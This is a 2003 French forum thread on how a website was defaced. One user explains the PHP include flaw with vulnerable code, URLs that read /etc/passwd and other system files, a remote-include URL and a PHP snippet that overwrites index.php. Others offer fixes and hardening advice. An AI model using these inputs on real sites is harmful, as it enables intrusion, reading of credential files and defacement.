 |
|
|
|
| [HACK] Comment ils ont fais ca? par  esox_ch |
vendredi 30 mai 2003 à 22:22:49 |
Bonsoir esox_ch, bonsoir à tous,
Est-ce bidon ? est-ce réel ? Aujourd'hui, dans SVM de juin, je lisais un débat sur les virus, le hacking, etc. et certains disaient qu'ils admireraient un virus ce contentant de dire "votre site n'est pas protégé" ! En voila donc un exemple ! En sais-tu plus esox_ch ? le pirate a-t'il juste ajouté sa page d'accueil ? (barre de titre déroulante, barre de status déroulante, etc.) @12C4 ... In medio stat virtus ... Ipl |
Oui je comprends bien ca, mais comment? En temps normal j'aurais pensser a un brute force sur leur ftp qui aurait trouver le mdp, mais quesque cela a à voir avec le php? Deplus le site du hacker a l'air de tenir debout meme s'il n'est pas tres bien renseigner sur les techniques d'attaque a caramail...
Eternel Questionneur. Seul et Unique membre de la : SPdLM => Société Protectrice des Langages Maltraités
|
Personne a une idée?
Eternel Questionneur. Seul et Unique membre de la : SPdLM => Société Protectrice des Langages Maltraités |
bonjour a tous,
Je peux répondre. personnes ne connaient les vulnérabilités PHP ici ? je peux en expliquer une qui aujourd'hui est vielle et dépassé. il s'agit de la faille include, la fonction include qui comme le savent la plupart sert a inclure des fichiers dans une page. imagninons un code : <? include("config.php"); //inclut le code config.php include("header.php"); //inclut le code header.php if(file_exists($page)) //si le fichier 'page' existe include($page); //inclut 'page' else // sinon include("erreur404.php"); //inclut une erreur 404 ?> on peut voir que ce code n'est pas protéger du tout ! oui il faut rajouter l'extension .php apres .inc system Unix : http://server/index.php?page=/etc/passwd http://server/index.php?page=/etc/hosts http://server/index.php?page=/etc/inetd.conf http://server/index.php?page=/etc/motd alors /etc/passwd sont toutes les cmd unix ils affichent le mot de passe comme /etc/passwd et celui qui est relativement dangereux mais rare : /etc/shadow on peut aussi inclure un site via la faille include en effet en gardant le meme code vous verrez que l'on peut faire : http://server/index.php?page=http://www.google.com là vous verrez afficher google, par contre si le site supporte le php on peut ainsi inclure un fichier par fopen de cette facon : http://server/index.php?page=http://server2/code-malicious.php dans ce code on pourrait mettre pour afficher les mots de passe : <?php $fp = fopen("index.php","w"); if (!$fp) { die("Erreur lors de l'accès au fichier"); } fputs($fp, 'LE CODE HTML QUE VOUS VOULEZ'); fclose($fp); ?> pour la sécurisation du premier code : <? include("config.php"); //inclut le code config.php include("header.php"); //inclut le code header.php $page = $page.".php"; // ajout d'une extension .php if(file_exists($page)) //si le fichier 'page' existe include($page); //inclut 'page' else // sinon include("erreur404.php"); //inclut une erreur 404 ?> c'est a peu pres tout, évidemment ce post est informatif mais en aucun cas vous ne devez utiliser cette technique pour défacer des sites, je dirais meme plus un post de sécurité informatique :) Bonne journée |
Bonjour fultama, bonjour à tous,
Je te remercie vivement pour tes explications ! En fait, j'écarquille les yeux (çà fait même mal) pour essayer de comprendre et de voir une différence entre un code erroné et un code protégé... LOL Bon, je relirai çà 10 fois dans les transports pendant la grêve à Paris et dans 3 jours, j'aurai compris un petit bout du début ! ;-) Merci ! Bonne journée, @12C4 ... In medio stat virtus ... Ipl
|
Note: le pirate devrait étudier l'orthographe :) |
l'important est la communication et la compréhension pas l'orthographe :) (c'est bon je rigole)
si vous avez besoin de moi pour ce genre d'explication appellez moi :) |
C'est sympa Fultama ! merci beaucoup !
@12C4 ... In medio stat virtus ... Ipl |
fultama, c'est affolant ce que tu nous dis là !
:,§_ ç _ (@)=(@) |
Il y a vraiment pire croyez moi.
je vous montrerais une autre faille quand j'aurais le temps(c'est a dire pas ce matin ...) voilà ++ |
Bonjour Fultama, M&M, bonjour à tous,
Fultama... ah oui, c'est très important de nous briefer là-dessus... quand tu auras un moment ! Merci ! @12C4 ... In medio stat virtus ... Ipl |
Salut tt le monde,
Ca me fait penser que j'ai vu qu'il y avait un article sur "comment proteger ses pages web avec php" dans le magasine Login (chez marchands de journeaux). Je ne peux pas vous dire ce que ca donne, je ne l'ai pas encore acheter, mais je crois que ca va pas tarder, je suis curieux... "2 choses sont infinies : l'univers et la betise humaine bien que en ce qui concerne la 1ere je n'ai pas encore de certitude absolue" |
dsl pour les fautes... :-(
C ca de pas faire gaffe lorsqu'on tape "2 choses sont infinies : l'univers et la betise humaine bien que en ce qui concerne la 1ere je n'ai pas encore de certitude absolue" |
Salut pour les uns, re- pour les autres.
Malheureusement, des failles y'en a partout. Et pas seulement au niveau de php. Je me rappelle que Apache permettait de remonter dans l'arborescence de la machine. Tenez vous au courant et bien que les installations de patch soient un risque à prendre serieusement en compte, il faut les installer. (Je ne rappellerai pas l'episode Sql Slammer). Kalamit, Modard par tous les temps (surtout ceux de grève) ! |
Salut @ tous !
En fait, il ya de nombreux moyens de taper sur un site PhP. La méthode de Fultama est très efficace. J'ajouterai que pour être fonctionnelle, le site contenant le code malicieux doit être statique... Mais bon... L'une des grosses faille réside dans le fait que les variables GET et POST des formulaires (et de l'URL) sont enregistrées comme variable globales. Il suffit d'avoir vu le code Php de la page pour détecter les failles ! On peut accéder à n'importe quelle variable ! Solution : register_global doit être désactivé (off) Dans ce cas, il faut récupérer les variables dans le script par le biais de $_POST[] ou $_GET[]. Une fonction très sympa aussi : import_request_variables("g", "extension_devant_la_variable"). Ca peut servir... Pour limiter les attaques distantes, le setting d'open_basedir est inévitable. Il est aussi très important de désactiver les messages d'erreur. Et l'importation de fichier doit aussi être strictement contrôlé... Ce qui fait la richesse de PhP fait aussi sa faiblesse... Bon, c'est un peu décousu... désolé... @+ [ Méfiez-vous des filets dérivants de la vie... ] |
arf un modérateur a supprimé mon post
on me dit : merci et tout pour l'aide sur ce genre de sujet comme la sécurité et le hacking c'est un sujet de conversation mais enfin bon je me suis cassé le cul a expliquer une faille Windows XP et 2000, puis on me supprime mon post la prochaine fois faites un avertissement @++
|
